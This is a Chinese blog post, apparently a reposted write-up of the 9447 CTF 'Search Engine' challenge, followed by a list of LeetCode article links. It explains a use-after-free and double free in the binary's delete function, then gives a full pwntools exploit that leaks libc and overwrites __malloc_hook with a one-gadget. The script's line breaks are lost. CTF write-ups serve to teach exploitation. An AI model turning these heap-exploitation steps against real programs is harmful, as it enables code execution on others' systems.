[double free] 9447 CTF : Search Engine
本文共 2945 字,大约阅读时间需要 9 分钟。
[double free] 9447 CTF : Search Engine
1. ida分析(越来越感觉这一步最重要)
-
_add_sentence
-
单词的结构体,gdb中的显示
-
单词的结构体为
struct word{ char * word_content,int word_size,char * sentence_content,int sentence_size,}
-
-
edit函数
- 看到这类的编辑,需要注意的是字符串最后的截断字符,是不是存在off by null 以及 是不是存在地址泄漏
-
delete函数
- 看到这类的删除,第一眼看指针有没有置空(NULL),没有的话存在
uaf,然后看free的条件是不是限制,没有限制的话会造成double free.这里的限制是寻找word,但是当包含word的sentence被删除时,仅仅是将sentence的内容置为0,word节点中的单词并没有删除,因此可以通过\x00,再次释放或者显示sentence,即double free和unstored leak
- 看到这类的删除,第一眼看指针有没有置空(NULL),没有的话存在
2. 思路
-
先申请small chunk,释放进入unstored bin,再通过查找
\x00,显示sentence,泄露libc地址
-
通过double free 触发 house of sprit,改写malloc_hook,触发onegadget
-
申请掉多余的chunk,得到指向fake chunk地址的chunk,修改malloc_hook为ongadget
-
-
再次分配chunk,就会触发onegadget
3. exp
from pwn import *# challenge informatp.context(arch='amd64',os='linux',log_level='debug')myelf = ELF("./search_engine")#libc = ELF("./libc_64.so.6")#p = process(myelf.path,env={"LD_PRELOAD" : libc.path})p = process(myelf.path)#p = remote('chall.pwnable.tw', 10203)# local libclocal_libc_64 = ELF("/lib/x86_64-linux-gnu/libc.so.6")local_libc_32 = ELF("/lib/i386-linux-gnu/libc.so.6")# functp.s for quick scripts = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) r = lambda numb=4096 :p.recv(numb)ru = lambda delims :p.recvuntil(delims)pa = lambda :p.interactive()# misc functp.suu32 = lambda data :u32(data.ljust(4, b'\0'))uu64 = lambda data :u64(data.ljust(8, b'\0'))leak = lambda name,addr :log.success('{} : {:#x}'.format(name, addr))def debug(): gdb.attach(p) pause() #passdef add_fake(size,cont): sla('3: Quit\n','2') sla('Enter the sentence size:\n',str(size)) sa('Enter the sentence:\n',cont.ljust(size,'x'))def add(size,cont): sla('3: Quit\n','2') sla('Enter the sentence size:\n',str(size)) sa('Enter the sentence:\n',cont.rjust(size,'x')) def delete(cont): sla('3: Quit\n','1') sla('Enter the word size:\n',str(len(cont))) sa('Enter the word:\n',cont) sla('Delete this sentence (y/n)?\n','y')def show(cont): sla('3: Quit\n','1') sla('Enter the word size:\n',str(len(cont))) sa('Enter the word:\n',cont)#leak libc add(0x88,' index0')debug()delete('index0')debug()show('\x00'*6)p.recvuntil(': ')libc_base = uu64(p.recv(6)) - 88 -0x3c4b20log.success('libc_base==>'+hex(libc_base))sla('Delete this sentence (y/n)?\n','n')one = libc_base + 0xf1247#alert double freeadd(0x60,' index1')add(0x60,' index2')add(0x60,' index3')#delete the sentence by the word delete('index1')delete('index2')delete('index3')show('\x00'*6)sla('Delete this sentence (y/n)?\n','n')sla('Delete this sentence (y/n)?\n','y')debug()#fake chunkfake = libc_base + local_libc_64.sym['__malloc_hook'] -0x23 add_fake(0x60,p64(fake))add(0x60,'pad')add(0x60,'pad')debug()add_fake(0x60,'a'*0x13+p64(one))gdb.attach(p)p.interactive() 转载地址:http://etugf.baihongyu.com/
你可能感兴趣的文章
【LEETCODE】20-Valid Parentheses
查看>>
【LEETCODE】290-Word Pattern
查看>>
【LEETCODE】36-Valid Sudoku
查看>>
【LEETCODE】205-Isomorphic Strings
查看>>
【LEETCODE】204-Count Primes
查看>>
【LEETCODE】228-Summary Ranges
查看>>
【LEETCODE】27-Remove Element
查看>>
【LEETCODE】66-Plus One
查看>>
【LEETCODE】26-Remove Duplicates from Sorted Array
查看>>
【LEETCODE】118-Pascal's Triangle
查看>>
【LEETCODE】119-Pascal's Triangle II
查看>>
【LEETCODE】88-Merge Sorted Array
查看>>
【LEETCODE】19-Remove Nth Node From End of List
查看>>
【LEETCODE】125-Valid Palindrome
查看>>
【LEETCODE】28-Implement strStr()
查看>>
【LEETCODE】6-ZigZag Conversion
查看>>
【LEETCODE】8-String to Integer (atoi)
查看>>
【LEETCODE】14-Longest Common Prefix
查看>>
【LEETCODE】38-Count and Say
查看>>
【LEETCODE】278-First Bad Version
查看>>